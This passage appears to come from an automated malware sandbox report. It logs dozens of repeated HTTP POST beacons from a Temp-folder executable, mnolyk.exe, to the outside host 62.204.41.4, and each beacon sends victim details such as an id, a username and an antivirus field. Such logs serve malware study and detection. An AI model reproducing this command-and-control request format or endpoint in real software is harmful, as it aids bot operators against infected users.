                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:25.760538101 CET476INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          336192.168.2.65005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:26.009358883 CET477OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:26.073587894 CET477INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          337192.168.2.65006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:26.448813915 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:26.515285015 CET478INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          338192.168.2.65006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:27.765974045 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:27.830638885 CET479INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          339192.168.2.65006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:28.090657949 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:28.155061007 CET480INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          34192.168.2.64975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:59.119448900 CET139OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:59.184709072 CET139INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          340192.168.2.65006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:28.396717072 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:28.460707903 CET481INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          341192.168.2.65006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:30.633739948 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:30.702920914 CET482INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          342192.168.2.65006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:30.943301916 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:31.006328106 CET490INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          343192.168.2.65006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:31.198972940 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:31.264014006 CET491INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          344192.168.2.65006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:31.452025890 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:31.516680002 CET492INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          345192.168.2.65006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:31.730232000 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:31.794500113 CET493INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          346192.168.2.65007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:31.982507944 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:32.048238039 CET494INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          347192.168.2.65007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:32.235512018 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:32.298506021 CET495INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          348192.168.2.65007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:32.475919008 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:32.540923119 CET496INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          349192.168.2.65007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:32.709343910 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:32.774380922 CET497INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          35192.168.2.64975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:59.355094910 CET140OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:59.418791056 CET140INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          350192.168.2.65007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:32.940709114 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:33.003427982 CET498INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          351192.168.2.65007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:33.175281048 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:33.239239931 CET499INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          352192.168.2.65007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:33.409322977 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:33.471015930 CET500INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          353192.168.2.65007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:33.659591913 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:33.723758936 CET501INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          354192.168.2.65007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:33.896003962 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
